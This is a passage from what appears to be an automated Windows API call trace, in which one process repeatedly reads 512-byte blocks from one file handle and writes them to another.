lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.861] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.861] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.862] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.862] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.863] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.863] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.864] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.864] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.865] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.865] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.866] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.866] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.867] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.867] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.868] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.868] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.869] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.869] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.870] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.870] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.871] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.871] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.872] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.872] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.873] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.873] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.874] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.874] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.875] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.875] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.876] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.876] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.876] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.877] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.877] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.878] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.878] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.879] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.879] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.880] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.880] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.881] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.881] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.882] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.882] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.883] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.883] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.884] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.884] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.885] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.885] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.886] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.886] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.887] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.887] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.888] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.888] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.888] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.894] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.895] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.895] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.896] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.896] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.897] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.897] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.898] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.898] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.899] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.899] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.900] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.900] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.900] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.901] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.901] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.902] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.902] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.903] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.903] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.904] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.904] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.905] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.905] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.906] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.906] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.907] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.907] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.908] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.908] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.909] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.909] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.910] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.910] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.911] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.911] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.912] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.912] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.913] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.913] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.914] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 